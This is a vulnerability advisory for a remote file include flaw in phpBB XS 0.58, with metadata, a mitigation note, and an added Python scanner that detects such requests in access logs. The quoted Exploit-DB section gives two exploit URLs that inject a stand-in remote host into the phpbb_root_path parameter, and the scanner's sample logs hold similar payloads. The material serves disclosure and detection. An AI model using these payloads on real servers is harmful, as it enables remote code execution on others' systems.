Vendor: phpBB XS
By: XORON - SHiKaA
CVSS: 7.5 HIGH
Remote File Include
CWE: 98
Product Name: phpBB XS
Affected Version From: 0.58
Affected Version To: 0.58
Patch Exists: YES
Related CWE: N/A
CPE: a:phpbb:phpbb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpBB XS <= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2)

An attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious URL in the phpbb_root_path parameter. This can allow the attacker to include a remote file containing arbitrary code and execute it on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.
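
One way to look for requests of the kind described above in web server access logs, as an added example that is not part of the original advisory. It assumes Apache/nginx combined log format and that clients never legitimately supply phpbb_root_path; the log lines, addresses and hosts are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request portion of an Apache/nginx combined-format access log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Value begins with a scheme or wrapper (http:, ftp:, php:, data:) or "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//)', re.I)
PARAM = "phpbb_root_path"

def classify(line):
    """Return a finding dict if the request supplies phpbb_root_path, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # parse_qsl percent-decodes names and values, so encoded forms such as
    # http%3A%2F%2F... are normalised before matching. PHP maps
    # "phpbb_root_path[]" onto the same variable, so strip any "[...]" suffix.
    values = [v for n, v in parse_qsl(parts.query, keep_blank_values=True)
              if n.split("[", 1)[0] == PARAM]
    if not values:
        return None
    remote = [v for v in values if REMOTE_RE.match(v)]
    return {"ip": m["ip"], "path": parts.path, "status": int(m["status"]),
            "value": (remote or values)[-1],
            "severity": "remote-include" if remote else "review"}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Sep/2006:10:00:01 +0000] "GET /forum/includes/functions_kb.php'
    '?phpbb_root_path=http://example.invalid/x? HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [28/Sep/2006:10:00:05 +0000] "GET /forum/includes/bbcb_mg.php'
    '?phpbb_root_path=http%3A%2F%2Fexample.invalid%2Fx%3F HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.12 - - [28/Sep/2006:10:00:09 +0000] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 900 "-" "-"',
    '192.0.2.13 - - [28/Sep/2006:10:00:12 +0000] "GET /forum/index.php?phpbb_root_path=./ HTTP/1.1" 200 700 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "remote-include" finding with a 200 status is the one to triage first; "review" marks requests that set the parameter to a non-URL value.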

Exploit-DB raw data:

###########################################################

#phpBB XS <= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2)

############################################################

#Author: XORON - SHiKaA

############################################################

#URL: http://www.comscripts.com/jump.php?action=script&id=1082

############################################################

#Class: Remote

############################################################

#Code:   include($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_bbcb_mg.' . $phpEx);

############################################################

#Exploit:

http://www.site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://evil_scripts?
http://www.site.com/[path]/includes/bbcb_mg.php?phpbb_root_path=http://evil_scripts?

############################################################

#Greetz: str0ke and AzzCoder ;)

############################################################

# milw0rm.com [2006-09-28]